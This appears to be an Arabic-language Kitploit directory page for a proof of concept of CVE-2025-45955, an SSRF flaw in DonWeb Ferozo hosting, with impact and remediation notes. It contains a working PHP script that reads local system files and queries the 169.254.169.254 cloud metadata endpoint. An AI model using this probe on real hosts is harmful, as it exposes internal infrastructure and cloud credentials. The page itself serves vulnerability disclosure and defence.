Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-45955 — إثبات المفهوم لثغرة CVE-2025-45955 التي توضح تزوير الطلب من جانب الخادم (SSRF) في منصة الاستضافة DonWeb Ferozo، مما يتيح رسم خرائط البنية التحتية الداخلية وتعداد البيانات الوصفية للسحابة. | Kitploit
أدوات/GitHubGitHub/surendrapuppala7/cve-2025-45955
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبأمن السحابة
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

إثبات المفهوم لثغرة CVE-2025-45955 التي توضح تزوير الطلب من جانب الخادم (SSRF) في منصة الاستضافة DonWeb Ferozo، مما يتيح رسم خرائط البنية التحتية الداخلية وتعداد البيانات الوصفية للسحابة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
13منذ 8 أشهرلم تتم المراجعة بعد

CVE-2025-45955

تزوير الطلب من جانب الخادم في DonWeb Ferozo (CVE-2025-45955)

الوصف

يمكن للمهاجم استغلال هذه الثغرة عن طريق رفع وتنفيذ ملف PHP مصمم خصيصًا على منصة استضافة Ferozo. عند الوصول إليه، يقوم الملف بسلسلة من محاولات SSRF تستهدف الخدمات الداخلية (مثل 127.0.0.1 و 169.254.169.254 أو نقاط نهاية شبكة الخدمات)، والملفات المحلية (مثل file:///etc/passwd)، ونقاط نهاية البيانات الوصفية السحابية المعروفة. يقوم النص البرمجي بجمع الاستجابات أو رسائل الخطأ، مما يسمح للمهاجم برسم خريطة البنية التحتية الداخلية، وتعداد الخدمات التي يمكن الوصول إليها، وجمع المعلومات الحساسة لمزيد من الاستغلال.

إثبات المفهوم (PoC)

الكود التالي يوضح الثغرة:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

المكون المتأثر

  • منصة استضافة Ferozo (DonWeb)
  • البيئات التي تعتمد على PHP والتي تسمح برفع ملفات PHP أو تنفيذ ملفات PHP يتحكم بها المستخدم

التأثير

  • كشف المعلومات: تسريب عناوين IP داخلية، محتويات ملفات، نقاط نهاية بيانات وصفية سحابية
  • استطلاع البنية التحتية: تمكين تعداد المنافذ والخدمات (Docker، Kubelet، إلخ)
  • إمكانية استغلال السحابة: فحص نقاط نهاية البيانات الوصفية المعروفة مثل AWS و GCP و Alibaba
  • فرصة للتسلسل: يمكن قرنها بثغرات محلية أخرى لتنفيذ الأوامر عن بعد (RCE) أو التنقل الجانبي

الإصلاح

  • تقييد دوال تضمين الملفات والوصول إلى عناوين URL (file_get_contents، fopen، إلخ)
  • منع الوصول إلى نطاقات IP الداخلية (127.0.0.0/8، 169.254.169.254، إلخ) عبر قواعد جدار الحماية الصادرة
  • تدقيق وتنقية مدخلات المستخدم التي قد تؤثر على مسارات الملفات أو عناوين URL

معرف CVE

CVE-2025-45955


المكتشف

أبلغ عن [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]

تنزيل الأداة